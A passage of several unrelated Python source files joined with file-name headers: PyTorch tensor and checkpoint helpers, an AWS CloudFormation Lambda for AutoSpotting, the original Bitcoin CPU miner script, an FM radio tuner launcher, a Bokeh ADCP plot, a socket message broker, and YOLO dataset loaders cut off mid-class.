idx = pad_idx(idx, max_lengths, pad, ndim=ndim)
idx = create_tensor(idx, tensor_type)
return idx
def maxlen(idx, ndim=None):
"""
Compute maxlen tuple from index
Args:
idx: a nd list of indices
ndim: ndim for idx
Returns:
- tensor shape (tuple) of index list
"""
def _max_tuple(tuples: List[Tuple]):
return tuple(max(sizes) for sizes in zip(*tuples))
if ndim is None:
if isinstance(idx, list):
tuples = [maxlen(i) for i in idx]
return (len(idx),) + _max_tuple(tuples)
else:
return tuple()
else:
if ndim > 1:
tuples = [maxlen(i, ndim-1) for i in idx]
return (len(idx),) + _max_tuple(tuples)
else:
return len(idx),
def pad_idx(idx, max_lengths, pad_id, ndim):
"""
Complete index list to a certain shape with padding
Args:
idx: a nd list of indices
max_lengths: n-size tuple defining shape
pad_id: padding index
ndim: dimension for idx
Returns:
- a nd list of indices with padding
"""
if ndim > 1:
l, suff = max_lengths[0], max_lengths[1:]
content = [pad_idx(i, suff, pad_id, ndim-1) for i in idx]
if len(idx) < l:
pad = create_pad((l - len(idx),) + suff, pad_id)
content += pad
return content
else:
return idx + [pad_id for _ in range(max_lengths[0] - len(idx))]
def create_pad(size, pad_id):
"""
Create a padding list of a given size
Args:
size: nd list shape
pad_id: padding index
Returns:
- padding list of the given size
"""
if len(size) == 1:
return [pad_id for _ in range(size[0])]
else:
return [create_pad(size[1:], pad_id) for _ in range(size[0])]
def create_tensor(idx: List, tensor_type) -> Tensor:
"""
Create torch tensor from index
Args:
idx: index list
tensor_type: type of tensor
Returns:
- a torch tensor created from index
"""
if tensor_type is int:
T = torch.LongTensor(idx)
elif tensor_type is float:
T = torch.FloatTensor(idx)
elif tensor_type is bool:
T = torch.BoolTensor(idx)
else:
raise TypeError
return T
def convert_tensor_to_idx(tensor: Tensor, bos: int = None, eos: int = None, pad: int = None):
"""
Convert a tensor to index.
Args:
tensor: original tensor
bos: begin-of-sequence index
eos: end-of-sequence index
pad: padding index
Returns:
- a nd list of indices
"""
idx = tensor.tolist()
if bos and eos and pad:
idx = remove_special_tokens(idx, bos, eos, pad)
return idx
def remove_special_tokens(idx, bos: int, eos: int, pad: int):
"""
Remove special tokens from nd index list
Args:
idx: a nd index list
bos: begin-of-sequence index
eos: end-of-sequence index
pad: padding index
Returns:
- index list without special tokens
"""
if isinstance(idx, list) and isinstance(idx[0], int):
if idx[0] == bos:
idx = idx[1:]
eos_pos = find_eos(idx, eos)
if eos_pos is not None:
idx = idx[:eos_pos]
idx = [i for i in idx if i != pad]
return idx
else:
return [remove_special_tokens(i, bos, eos, pad) for i in idx]
def find_eos(idx: list, eos: int):
"""
Find eos position
Args:
idx: index list
eos: end-of-sequence index
Returns:
- position of eos
"""
for pos, i in enumerate(idx):
if i == eos:
return pos
return None
def _to_device(tensor, device, fp16=False):
"""
Move a tensor to device
Args:
tensor: original tensor
device: device name
fp16: whether to perform fp16
Returns:
- tensor on the given device
"""
if isinstance(tensor, torch.Tensor):
if device.startswith('cuda'):
tensor = tensor.cuda()
if isinstance(tensor, torch.FloatTensor) and fp16:
tensor = tensor.half()
elif device == 'cpu':
tensor = tensor.cpu()
return tensor
def half_samples(samples):
"""
Half tensor of the given samples
Args:
samples: samples to half
Returns:
- halved samples
"""
if isinstance(samples, List):
halved = []
is_dummy = False
for s in samples:
hs, dummy = half_samples(s)
is_dummy = dummy or is_dummy
halved.append(hs)
return halved, is_dummy
elif isinstance(samples, Dict):
t = get_example_obj(samples)
size = t.size(0)
idx = np.random.choice(list(range(size)), size // 2, replace=False)
if len(idx) > 0:
index = recursive(index_tensor)
return index(samples, idx), False
else:
dummy = recursive(dummy_tensor)
return dummy(samples), True
else:
raise NotImplementedError
def index_tensor(tensor, idx):
"""
select tensor with the row of given indices
Args:
tensor: original
idx: index to keep
Returns:
- tensor with selected row
"""
return tensor[idx]
def dummy_tensor(tensor):
size = tensor.size()
new_size = tuple([1 for _ in size[1:]])
tot = 1
for s in size:
tot *= s
tensor = tensor.view((tot, ) + new_size)
tensor = tensor[:1]
return tensor
def get_example_obj(x):
"""
Get a example object from List, Tuple or Dict
Args:
x: given object
Returns:
- an example object
"""
if isinstance(x, List) or isinstance(x, Tuple):
return get_example_obj(x[0])
elif isinstance(x, Dict):
for v in x.values():
return get_example_obj(v)
else:
return x
@contextmanager
def possible_autocast():
"""
Possibly perform autocast
"""
env = Environment()
if env.fp16:
with autocast():
yield
else:
yield
@singleton
class GradScalerSingleton:
"""
GradScaler for fp16 training
"""
def __init__(self) -> None:
self._grad_scaler = GradScaler()
def scale_loss(self, loss):
return self._grad_scaler.scale(loss)
def step(self, optimizer):
self._grad_scaler.step(optimizer)
def update(self):
self._grad_scaler.update()
def possible_scale_loss(loss):
"""
Possibly scale loss in fp training
"""
env = Environment()
if env.fp16:
grad_scaler = GradScalerSingleton()
return grad_scaler.scale_loss(loss)
else:
return loss
def save_avg_ckpt(last_ckpts, save_path, timeout=10000, wait=False):
def _save(ckpts, path, timeout=10000):
for ckpt in ckpts:
if not wait_until_exist(ckpt, timeout=timeout):
logger.info(f'timeout: {ckpt} not found')
return
time.sleep(10)
avg_state_dict = get_avg_ckpt(ckpts)
save_ckpt(avg_state_dict, path, wait=True)
if wait:
_save(last_ckpts, save_path, timeout)
else:
Process(target=_save, args=(last_ckpts, save_path, timeout)).start()
def save_ckpt(state_dict, path, retry=5, wait=False):
def _save(state_dict, path):
for _ in range(retry):
try:
tmp_path = f"tmp.put.{path.split('/')[-1]}"
with open(tmp_path, 'wb') as fout:
torch.save(state_dict, fout)
if path.startswith('hdfs:'):
subprocess.run(["hadoop", "fs", "-put", "-f", tmp_path, path],
stdout=subprocess.DEVNULL,
stderr=subprocess.DEVNULL)
subprocess.run(['rm', tmp_path], stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL)
else:
subprocess.run(["mv", tmp_path, path],
stdout=subprocess.DEVNULL,
stderr=subprocess.DEVNULL)
logger.info(f'successfully save state_dict to {path}')
break
except Exception as e:
logger.warning(f'saving checkpoint {path} fails: {e}')
state_dict = to_device(state_dict, 'cpu')
if wait:
_save(state_dict, path)
else:
Process(target=_save, args=(state_dict, path)).start()
def get_avg_ckpt(ckpt_paths, device='cpu'):
state_dict_list = []
for path in ckpt_paths:
if path.startswith('hdfs:'):
local_path = f'tmp.get.{path.split("/")[-1]}'
subprocess.run(['hadoop', 'fs', '-get', path, local_path])
with open(local_path, 'rb') as fin:
state_dict_list.append(torch.load(fin, map_location=device)['model'])
subprocess.run(['rm', local_path])
else:
with open(path, 'rb') as fin:
state_dict_list.append(torch.load(fin, map_location=device)['model'])
state_dict = average_checkpoints(state_dict_list)
return {"model": state_dict}
def average_checkpoints(state_dict_list: List):
state_dict = OrderedDict()
for i, sd in enumerate(state_dict_list):
for key in sd:
p = sd[key]
if isinstance(p, torch.HalfTensor):
p = p.float()
if i == 0:
state_dict[key] = p.numpy()
else:
state_dict[key] = state_dict[key] + p.numpy()
ckpt_num = len(state_dict_list)
for key in state_dict:
state_dict[key] = state_dict[key] / ckpt_num
state_dict[key] = torch.from_numpy(state_dict[key])
return state_dict
to_device = recursive(_to_device)
|
regional_stack_lambda.py | '''
Creates regional CloudFormation stacks that trigger the main AutoSpotting
Lambda function
'''
from json import dumps
from sys import exc_info
from threading import Thread
from traceback import print_exc
from boto3 import client
from botocore.exceptions import ClientError
from botocore.vendored import requests
from botocore.vendored.requests.exceptions import RequestException
SUCCESS = "SUCCESS"
FAILED = "FAILED"
STACK_NAME = 'AutoSpottingRegionalResources'
TEMPLATE_URL = \
'https://s3.amazonaws.com/cloudprowess/nightly/regional_template.yaml'
def create_stack(region, lambda_arn):
'''Creates a regional CloudFormation stack'''
cfn = client('cloudformation', region)
response = {}
# delete stack if it already exists from a previous run
try:
delete_stack(region)
except ClientError:
pass
response = cfn.create_stack(
StackName=STACK_NAME,
TemplateURL=TEMPLATE_URL,
Capabilities=['CAPABILITY_IAM'],
Parameters=[
{
'ParameterKey': 'AutoSpottingLambdaARN',
'ParameterValue': lambda_arn,
},
],
)
print(response)
def delete_stack(region):
''' Deletes a regional CloudFormation stack'''
cfn = client('cloudformation', region)
response = cfn.delete_stack(StackName=STACK_NAME)
print(response)
waiter = cfn.get_waiter('stack_delete_complete')
waiter.wait(
StackName=STACK_NAME,
WaiterConfig={'Delay': 5}
)
def handle_create(event):
''' Creates regional stacks in all available AWS regions concurrently '''
ec2 = client('ec2')
lambda_arn = event['ResourceProperties']['LambdaARN']
threads = []
# create concurrently in all regions
for region in ec2.describe_regions()['Regions']:
process = Thread(target=create_stack,
args=[region['RegionName'], lambda_arn])
process.start()
threads.append(process)
for process in threads:
process.join()
def handle_delete():
''' Concurrently deletes regional stacks in all available AWS regions '''
ec2 = client('ec2')
threads = []
# delete concurrently in all regions
for region in ec2.describe_regions()['Regions']:
process = Thread(target=delete_stack, args=[region['RegionName']])
process.start()
threads.append(process)
for process in threads:
process.join()
def handler(event, context):
''' Lambda function entry point '''
try:
if event['RequestType'] == 'Create':
handle_create(event)
if event['RequestType'] == 'Delete':
handle_delete()
send(event, context, SUCCESS, {})
except ClientError:
print_exc()
print("Unexpected error:", exc_info()[0])
send(event, context, FAILED, {})
def send(event, context, response_status, response_data):
''' Informs CloudFormation about the state of the custom resource '''
response_url = event['ResponseURL']
print(response_url)
response_body = {}
response_body['Status'] = response_status
response_body['Reason'] = \
'See the details in CloudWatch Log Stream: ' + context.log_stream_name
response_body['PhysicalResourceId'] = context.log_stream_name
response_body['StackId'] = event['StackId']
response_body['RequestId'] = event['RequestId']
response_body['LogicalResourceId'] = event['LogicalResourceId']
response_body['NoEcho'] = None
response_body['Data'] = response_data
json_response_body = dumps(response_body)
print("Response body:\n" + json_response_body)
headers = {
'content-type': '',
'content-length': str(len(json_response_body))
}
try:
response = requests.put(response_url,
data=json_response_body,
headers=headers)
print("Status code: " + response.reason)
except RequestException as exception:
print("send(..) failed executing requests.put(..): " + str(exception))
|
pyminer.py | #!/usr/bin/python
#
# Copyright (c) 2011 The Bitcoin developers
# Distributed under the MIT/X11 software license, see the accompanying
# file license.txt or http://www.opensource.org/licenses/mit-license.php.
#
import time
import json
import pprint
import hashlib
import struct
import re
import base64
import httplib
import sys
from multiprocessing import Process
ERR_SLEEP = 15
MAX_NONCE = 1000000L
settings = {}
pp = pprint.PrettyPrinter(indent=4)
class BitcoinRPC:
OBJID = 1
def __init__(self, host, port, username, password):
authpair = "%s:%s" % (username, password)
self.authhdr = "Basic %s" % (base64.b64encode(authpair))
self.conn = httplib.HTTPConnection(host, port, False, 30)
def rpc(self, method, params=None):
self.OBJID += 1
obj = { 'version' : '1.1',
'method' : method,
'id' : self.OBJID }
if params is None:
obj['params'] = []
else:
obj['params'] = params
self.conn.request('POST', '/', json.dumps(obj),
{ 'Authorization' : self.authhdr,
'Content-type' : 'application/json' })
resp = self.conn.getresponse()
if resp is None:
print "JSON-RPC: no response"
return None
body = resp.read()
resp_obj = json.loads(body)
if resp_obj is None:
print "JSON-RPC: cannot JSON-decode body"
return None
if 'error' in resp_obj and resp_obj['error'] != None:
return resp_obj['error']
if 'result' not in resp_obj:
print "JSON-RPC: no result in object"
return None
return resp_obj['result']
def getblockcount(self):
return self.rpc('getblockcount')
def getwork(self, data=None):
return self.rpc('getwork', data)
def uint32(x):
return x & 0xffffffffL
def bytereverse(x):
return uint32(( ((x) << 24) | (((x) << 8) & 0x00ff0000) |
(((x) >> 8) & 0x0000ff00) | ((x) >> 24) ))
def bufreverse(in_buf):
out_words = []
for i in range(0, len(in_buf), 4):
word = struct.unpack('@I', in_buf[i:i+4])[0]
out_words.append(struct.pack('@I', bytereverse(word)))
return ''.join(out_words)
def wordreverse(in_buf):
out_words = []
for i in range(0, len(in_buf), 4):
out_words.append(in_buf[i:i+4])
out_words.reverse()
return ''.join(out_words)
class Miner:
def __init__(self, id):
self.id = id
self.max_nonce = MAX_NONCE
def work(self, datastr, targetstr):
# decode work data hex string to binary
static_data = datastr.decode('hex')
static_data = bufreverse(static_data)
# the first 76b of 80b do not change
SWE_hdr = static_data[:76]
# decode 256-bit target value
targetbin = targetstr.decode('hex')
targetbin = targetbin[::-1] # byte-swap and dword-swap
targetbin_str = targetbin.encode('hex')
target = long(targetbin_str, 16)
# pre-hash first 76b of block header
static_hash = hashlib.sha256()
static_hash.update(SWE_hdr)
for nonce in xrange(self.max_nonce):
# encode 32-bit nonce value
nonce_bin = struct.pack("<I", nonce)
# hash final 4b, the nonce value
hash1_o = static_hash.copy()
hash1_o.update(nonce_bin)
hash1 = hash1_o.digest()
# sha256 hash of sha256 hash
hash_o = hashlib.sha256()
hash_o.update(hash1)
hash = hash_o.digest()
# quick test for winning solution: high 32 bits zero?
if hash[-4:] != '\0\0\0\0':
continue
# convert binary hash to 256-bit Python long
hash = bufreverse(hash)
hash = wordreverse(hash)
hash_str = hash.encode('hex')
l = long(hash_str, 16)
# proof-of-work test: hash < target
if l < target:
print time.asctime(), "PROOF-OF-WORK found: %064x" % (l,)
return (nonce + 1, nonce_bin)
else:
print time.asctime(), "PROOF-OF-WORK false positive %064x" % (l,)
# return (nonce + 1, nonce_bin)
return (nonce + 1, None)
def submit_work(self, rpc, original_data, nonce_bin):
nonce_bin = bufreverse(nonce_bin)
nonce = nonce_bin.encode('hex')
solution = original_data[:152] + nonce + original_data[160:256]
param_arr = [ solution ]
result = rpc.getwork(param_arr)
print time.asctime(), "--> Upstream RPC result:", result
def iterate(self, rpc):
work = rpc.getwork()
if work is None:
time.sleep(ERR_SLEEP)
return
if 'data' not in work or 'target' not in work:
time.sleep(ERR_SLEEP)
return
time_start = time.time()
(hashes_done, nonce_bin) = self.work(work['data'],
work['target'])
time_end = time.time()
time_diff = time_end - time_start
self.max_nonce = long(
(hashes_done * settings['scantime']) / time_diff)
if self.max_nonce > 0xfffffffaL:
self.max_nonce = 0xfffffffaL
if settings['hashmeter']:
print "HashMeter(%d): %d hashes, %.2f Khash/sec" % (
self.id, hashes_done,
(hashes_done / 1000.0) / time_diff)
if nonce_bin is not None:
self.submit_work(rpc, work['data'], nonce_bin)
def loop(self):
rpc = BitcoinRPC(settings['host'], settings['port'],
settings['rpcuser'], settings['rpcpass'])
if rpc is None:
return
while True:
self.iterate(rpc)
def miner_thread(id):
miner = Miner(id)
miner.loop()
if __name__ == '__main__':
if len(sys.argv) != 2:
print "Usage: pyminer.py CONFIG-FILE"
sys.exit(1)
f = open(sys.argv[1])
for line in f:
# skip comment lines
m = re.search('^\s*#', line)
if m:
continue
# parse key=value lines
m = re.search('^(\w+)\s*=\s*(\S.*)$', line)
if m is None:
continue
settings[m.group(1)] = m.group(2)
f.close()
if 'host' not in settings:
settings['host'] = '127.0.0.1'
if 'port' not in settings:
settings['port'] = 8332
if 'threads' not in settings:
settings['threads'] = 1
if 'hashmeter' not in settings:
settings['hashmeter'] = 0
if 'scantime' not in settings:
settings['scantime'] = 30L
if 'rpcuser' not in settings or 'rpcpass' not in settings:
print "Missing username and/or password in cfg file"
sys.exit(1)
settings['port'] = int(settings['port'])
settings['threads'] = int(settings['threads'])
settings['hashmeter'] = int(settings['hashmeter'])
settings['scantime'] = long(settings['scantime'])
thr_list = []
for thr_id in range(settings['threads']):
p = Process(target=miner_thread, args=(thr_id,))
p.start()
thr_list.append(p)
time.sleep(1) # stagger threads
print settings['threads'], "mining threads started"
print time.asctime(), "Miner Starts - %s:%s" % (settings['host'], settings['port'])
try:
for thr_proc in thr_list:
thr_proc.join()
except KeyboardInterrupt:
pass
print time.asctime(), "Miner Stops - %s:%s" % (settings['host'], settings['port'])
|
radiotuner.py | #!/usr/bin/env python3
from backend.streamer import AudioPipe
from backend.player import player_main
from frontend.tui import TUI_main
from frontend.webserver import define_webserver
from threading import Thread
from queue import Queue
import argparse
import socket
# Parse arguments
parser = argparse.ArgumentParser(description='Tune FM radio.')
parser.add_argument(metavar='freq', type=float, dest='freq',
help='the tune frequency in MHz')
parser.add_argument("-ui", default='none', help=" select User Interface none/terminal/web")
parser.add_argument("-port", default='8081', help=" port used for web UI")
args = parser.parse_args()
if args.ui != 'none' and args.ui != 'terminal' and args.ui != 'web':
print('Invalid UI. Please use: none | terminal | web')
quit()
# Create inter thread communication queues
player_q = Queue()
tui_q = Queue()
# Create WebServer (without starting it)
[app, sio] = define_webserver(player_q)
# Create player thread (without starting it)
th_player = Thread(target=player_main, args=(player_q, tui_q, sio, args.freq))
# Create TUI thread (without starting it)
th_tui = Thread(target=TUI_main, args=(tui_q, player_q))
# Create streamer (without starting it)
#audio = AudioPipe()
try:
# Start streaming audio from Radio to Speaker
#audio.start()
# Start player thread
th_player.start()
if args.ui =='terminal':
th_tui.start()
# This has to go last, as sio.run is blocking
if args.ui == 'web':
print('Starting Web UI on: http://' + str(socket.gethostname()) + ':' + str(args.port))
# Start Webserver
sio.run(app, port=args.port, host='0.0.0.0', debug=False)
# When server ends, end app
player_q.put(['quit',0])
# Wait for threads to end
if th_tui.is_alive():
th_tui.join()
if th_player.is_alive():
th_player.join()
# Stop audio stream
#if audio is not None:
# audio.stop()
except KeyboardInterrupt:
if th_tui.is_alive():
tui_q.put(['quit', None, None])
th_tui.join()
if th_player.is_alive():
player_q.put(['quit',0])
th_player.join()
#if audio is not None:
# audio.stop()
|
main.py | import logging
import threading
from bokeh.io import curdoc
from bokeh.models import ColumnDataSource
from bokeh.plotting import Figure
from Comm.EnsembleJsonData import ADCP
from Ensemble.Ensemble import Ensemble
logger = logging.getLogger("EnsembleReceiver")
logger.setLevel(logging.DEBUG)
FORMAT = '[%(asctime)-15s][%(levelname)s][%(funcName)s] %(message)s'
logging.basicConfig(format=FORMAT)
class BeamVelocityLivePlot:
"""
Plot Beam Velocity data live using Bokeh server.
bokeh serve .
"""
def __init__(self, udp_port):
"""
Call the super class to pass the UDP port.
:param udp_port: UDP Port to read the JSON data.
"""
#super(LivePlot, self).__init__(udp_port)
super().__init__()
self.source = ColumnDataSource(dict(bins=[], beamVelB0=[], beamVelB1=[]))
self.lastData = None
fig = Figure()
fig.line(source=self.source, x='beamVelB0', y='bins', line_width=2, alpha=.85, color='red')
fig.line(source=self.source, x='beamVelB1', y='bins', line_width=2, alpha=.85, color='blue')
curdoc().add_root(fig)
curdoc().add_periodic_callback(self.update_data, 200)
self.Adcp = ADCP()
self.t = threading.Thread(target=self.Adcp.connect, args=[55057])
self.t.start()
logger.info("init Beam Velocity plot")
def close(self):
logger.info("Close plot")
self.Adcp.close()
def update_data(self):
#logger.info("Update plot")
if self.Adcp.EnsembleData is None and self.Adcp.BeamVelocity is None:
pass
bins = []
velB0 = []
velB1 = []
velB2 = []
velB3 = []
for bin in range(self.Adcp.EnsembleData["NumBins"]):
bins.append(bin)
if Ensemble().is_float_close(self.Adcp.BeamVelocity["Velocities"][bin][0], Ensemble().BadVelocity):
velB0.append(self.Adcp.BeamVelocity["Velocities"][bin][0])
else:
velB0.append(0.0)
if Ensemble().is_float_close(self.Adcp.BeamVelocity["Velocities"][bin][1], Ensemble().BadVelocity):
velB1.append(self.Adcp.BeamVelocity["Velocities"][bin][1])
else:
velB1.append(0.0)
velB2.append(self.Adcp.BeamVelocity["Velocities"][bin][2])
velB3.append(self.Adcp.BeamVelocity["Velocities"][bin][3])
#new_data = dict(x=[self.Adcp.Amplitude["EnsembleNumber"]], amp=[self.Adcp.Amplitude["Amplitude"][0][1]])
new_data = dict(beamVelB0=velB0, beamVelB1=velB1, bins=bins)
self.source.stream(new_data, 100)
logger.info("Start Beam Velocity Plot")
amp = BeamVelocityLivePlot(55057)
#amp.close()
logger.info("Beam Velocity Plot Closed")
|
broker.py | import selectors
import socket
import types
import queue
import threading
from message_handler import MessageHandler
from datetime import datetime
class Broker():
_BINDING_IP = '127.0.0.1'
_BINDING_PORT = 65432
_consumerSelector = None
_QUEUE_SIZE = 2
_messageQueue = None
_messageHandler = None
_MAX_BUFFER_SIZE = 4096
def __init__(self):
self._messageQueue = queue.Queue(self._QUEUE_SIZE)
self._messageHandler = MessageHandler()
def _initiateConsumerSelector(self):
self._consumerSelector = selectors.DefaultSelector()
lsock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
lsock.bind((self._BINDING_IP, self._BINDING_PORT))
lsock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
lsock.listen()
print('listening on', (self._BINDING_IP, self._BINDING_PORT))
lsock.setblocking(False)
self._consumerSelector.register(lsock, selectors.EVENT_READ, data=None)
self._acceptConnections()
def _register(self, sock):
conn, addr = sock.accept() # Should be ready to read
print('accepted connection from', addr)
conn.setblocking(False)
data = types.SimpleNamespace(addr=addr, outb=b'')
events = selectors.EVENT_WRITE
self._consumerSelector.register(conn, events, data=data)
def _acceptConnections(self):
while True:
events = self._consumerSelector.select(timeout=None)
for key, mask in events:
if key.data is None:
self._register(key.fileobj)
else:
self._service_connection(key, mask)
def _sendAll(self, socket, data):
dataLength = len(data)
while dataLength > self._MAX_BUFFER_SIZE:
self._safeSend(socket, data[:self._MAX_BUFFER_SIZE])
dataLength -= self._MAX_BUFFER_SIZE
data = data[self._MAX_BUFFER_SIZE:]
#send remaining bytes
self._safeSend(socket, data)
def _safeSend(self, socket, data):
try:
sent = socket.send(data) # Should be ready to write
except BlockingIOError:
# Resource temporarily unavailable (errno EWOULDBLOCK)
print('Resource temporarily unavailable: trying again...')
self._safeSend(socket, data)
except BrokenPipeError:
#ToDo try to send the entire data again
print('connection lost')
self._consumerSelector.unregister(socket)
socket.close()
def _service_connection(self, key, mask):
sock = key.fileobj
dataOverSocket = key.data
if mask & selectors.EVENT_WRITE:
'''if not dataOverSocket.outb:
data = self._pop()'''
data = self._pop()
'''if self._messageQueue.qsize() == 0:
print('ended at:', now = datetime.now().time())'''
if data:
#dataOverSocket.outb = data
self._sendAll(sock, data)
#print('sending', repr(data), 'to', dataOverSocket.addr)
#dataOverSocket.outb = dataOverSocket.outb[sent:]
def start(self):
initThread = threading.Thread(target=self._initiateConsumerSelector)
initThread.start()
#self._initiateConsumerSelector()
def push(self, data=None, meta=None, isByteData=False):
if data == None:
print('No data to push')
pass
packet = self._messageHandler.createMessage(data, meta, isByteData)
#print('pushing', packet, ': current queue size', self._messageQueue.qsize())
self._messageQueue.put(packet, block=True)
def _pop(self):
return self._messageQueue.get(block=True) |
datasets.py | # Dataset utils and dataloaders
import glob
import math
import os
import random
import shutil
import time
from itertools import repeat
from multiprocessing.pool import ThreadPool
from pathlib import Path
from threading import Thread
import cv2
import numpy as np
import torch
from PIL import Image, ExifTags
from torch.utils.data import Dataset
from tqdm import tqdm
import pickle
from copy import deepcopy
from pycocotools import mask as maskUtils
from torchvision.utils import save_image
from utils.general import xyxy2xywh, xywh2xyxy
from utils.torch_utils import torch_distributed_zero_first
# Parameters
help_url = 'https://github.com/ultralytics/yolov5/wiki/Train-Custom-Data'
img_formats = ['bmp', 'jpg', 'jpeg', 'png', 'tif', 'tiff', 'dng'] # acceptable image suffixes
vid_formats = ['mov', 'avi', 'mp4', 'mpg', 'mpeg', 'm4v', 'wmv', 'mkv'] # acceptable video suffixes
# Get orientation exif tag
for orientation in ExifTags.TAGS.keys():
if ExifTags.TAGS[orientation] == 'Orientation':
break
def get_hash(files):
# Returns a single hash value of a list of files
return sum(os.path.getsize(f) for f in files if os.path.isfile(f))
def exif_size(img):
# Returns exif-corrected PIL size
s = img.size # (width, height)
try:
rotation = dict(img._getexif().items())[orientation]
if rotation == 6: # rotation 270
s = (s[1], s[0])
elif rotation == 8: # rotation 90
s = (s[1], s[0])
except:
pass
return s
def create_dataloader(path, imgsz, batch_size, stride, opt, hyp=None, augment=False, cache=False, pad=0.0, rect=False,
rank=-1, world_size=1, workers=8):
# Make sure only the first process in DDP process the dataset first, and the following others can use the cache
with torch_distributed_zero_first(rank):
dataset = LoadImagesAndLabels(path, imgsz, batch_size,
augment=augment, # augment images
hyp=hyp, # augmentation hyperparameters
rect=rect, # rectangular training
cache_images=cache,
single_cls=opt.single_cls,
stride=int(stride),
pad=pad,
rank=rank)
batch_size = min(batch_size, len(dataset))
nw = min([os.cpu_count() // world_size, batch_size if batch_size > 1 else 0, workers]) # number of workers
sampler = torch.utils.data.distributed.DistributedSampler(dataset) if rank != -1 else None
dataloader = InfiniteDataLoader(dataset,
batch_size=batch_size,
num_workers=nw,
sampler=sampler,
pin_memory=True,
collate_fn=LoadImagesAndLabels.collate_fn) # torch.utils.data.DataLoader()
return dataloader, dataset
def create_dataloader9(path, imgsz, batch_size, stride, opt, hyp=None, augment=False, cache=False, pad=0.0, rect=False,
rank=-1, world_size=1, workers=8):
# Make sure only the first process in DDP process the dataset first, and the following others can use the cache
with torch_distributed_zero_first(rank):
dataset = LoadImagesAndLabels9(path, imgsz, batch_size,
augment=augment, # augment images
hyp=hyp, # augmentation hyperparameters
rect=rect, # rectangular training
cache_images=cache,
single_cls=opt.single_cls,
stride=int(stride),
pad=pad,
rank=rank)
batch_size = min(batch_size, len(dataset))
nw = min([os.cpu_count() // world_size, batch_size if batch_size > 1 else 0, workers]) # number of workers
sampler = torch.utils.data.distributed.DistributedSampler(dataset) if rank != -1 else None
dataloader = InfiniteDataLoader(dataset,
batch_size=batch_size,
num_workers=nw,
sampler=sampler,
pin_memory=True,
collate_fn=LoadImagesAndLabels9.collate_fn) # torch.utils.data.DataLoader()
return dataloader, dataset
class InfiniteDataLoader(torch.utils.data.dataloader.DataLoader):
""" Dataloader that reuses workers
Uses same syntax as vanilla DataLoader
"""
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
object.__setattr__(self, 'batch_sampler', _RepeatSampler(self.batch_sampler))
self.iterator = super().__iter__()
def __len__(self):
return len(self.batch_sampler.sampler)
def __iter__(self):
for i in range(len(self)):
yield next(self.iterator)
class _RepeatSampler(object):
""" Sampler that repeats forever
Args:
sampler (Sampler)
"""
def __init__(self, sampler):
self.sampler = sampler
def __iter__(self):
while True:
yield from iter(self.sampler)
class LoadImages: # for inference
def __init__(self, path, img_size=640, auto_size=32):
p = str(Path(path)) # os-agnostic
p = os.path.abspath(p) # absolute path
if '*' in p:
files = sorted(glob.glob(p, recursive=True)) # glob
elif os.path.isdir(p):
files = sorted(glob.glob(os.path.join(p, '*.*'))) # dir
elif os.path.isfile(p):
files = [p] # files
else:
raise Exception('ERROR: %s does not exist' % p)
images = [x for x in files if x.split('.')[-1].lower() in img_formats]
videos = [x for x in files if x.split('.')[-1].lower() in vid_formats]
ni, nv = len(images), len(videos)
self.img_size = img_size
self.auto_size = auto_size
self.files = images + videos
self.nf = ni + nv # number of files
self.video_flag = [False] * ni + [True] * nv
self.mode = 'images'
if any(videos):
self.new_video(videos[0]) # new video
else:
self.cap = None
assert self.nf > 0, 'No images or videos found in %s. Supported formats are:\nimages: %s\nvideos: %s' % \
(p, img_formats, vid_formats)
def __iter__(self):
self.count = 0
return self
def __next__(self):
if self.count == self.nf:
raise StopIteration
path = self.files[self.count]
if self.video_flag[self.count]:
# Read video
self.mode = 'video'
ret_val, img0 = self.cap.read()
if not ret_val:
self.count += 1
self.cap.release()
if self.count == self.nf: # last video
raise StopIteration
else:
path = self.files[self.count]
self.new_video(path)
ret_val, img0 = self.cap.read()
self.frame += 1
print('video %g/%g (%g/%g) %s: ' % (self.count + 1, self.nf, self.frame, self.nframes, path), end='')
else:
# Read image
self.count += 1
img0 = cv2.imread(path) # BGR
assert img0 is not None, 'Image Not Found ' + path
#print('image %g/%g %s: ' % (self.count, self.nf, path), end='')
# Padded resize
img = letterbox(img0, new_shape=self.img_size, auto_size=self.auto_size)[0]
# Convert
img = img[:, :, ::-1].transpose(2, 0, 1) # BGR to RGB, to 3x416x416
img = np.ascontiguousarray(img)
return path, img, img0, self.cap
def new_video(self, path):
self.frame = 0
self.cap = cv2.VideoCapture(path)
self.nframes = int(self.cap.get(cv2.CAP_PROP_FRAME_COUNT))
def __len__(self):
return self.nf # number of files
class LoadWebcam: # for inference
def __init__(self, pipe='0', img_size=640):
self.img_size = img_size
if pipe.isnumeric():
pipe = eval(pipe) # local camera
# pipe = 'rtsp://192.168.1.64/1' # IP camera
# pipe = 'rtsp://username:password@192.168.1.64/1' # IP camera with login
# pipe = 'http://wmccpinetop.axiscam.net/mjpg/video.mjpg' # IP golf camera
self.pipe = pipe
self.cap = cv2.VideoCapture(pipe) # video capture object
self.cap.set(cv2.CAP_PROP_BUFFERSIZE, 3) # set buffer size
def __iter__(self):
self.count = -1
return self
def __next__(self):
self.count += 1
if cv2.waitKey(1) == ord('q'): # q to quit
self.cap.release()
cv2.destroyAllWindows()
raise StopIteration
# Read frame
if self.pipe == 0: # local camera
ret_val, img0 = self.cap.read()
img0 = cv2.flip(img0, 1) # flip left-right
else: # IP camera
n = 0
while True:
n += 1
self.cap.grab()
if n % 30 == 0: # skip frames
ret_val, img0 = self.cap.retrieve()
if ret_val:
break
# Print
assert ret_val, 'Camera Error %s' % self.pipe
img_path = 'webcam.jpg'
print('webcam %g: ' % self.count, end='')
# Padded resize
img = letterbox(img0, new_shape=self.img_size)[0]
# Convert
img = img[:, :, ::-1].transpose(2, 0, 1) # BGR to RGB, to 3x416x416
img = np.ascontiguousarray(img)
return img_path, img, img0, None
def __len__(self):
return 0
class LoadStreams: # multiple IP or RTSP cameras
def __init__(self, sources='streams.txt', img_size=640):
self.mode = 'images'
self.img_size = img_size
if os.path.isfile(sources):
with open(sources, 'r') as f:
sources = [x.strip() for x in f.read().splitlines() if len(x.strip())]
else:
sources = [sources]
n = len(sources)
self.imgs = [None] * n
self.sources = sources
for i, s in enumerate(sources):
# Start the thread to read frames from the video stream
print('%g/%g: %s... ' % (i + 1, n, s), end='')
cap = cv2.VideoCapture(eval(s) if s.isnumeric() else s)
assert cap.isOpened(), 'Failed to open %s' % s
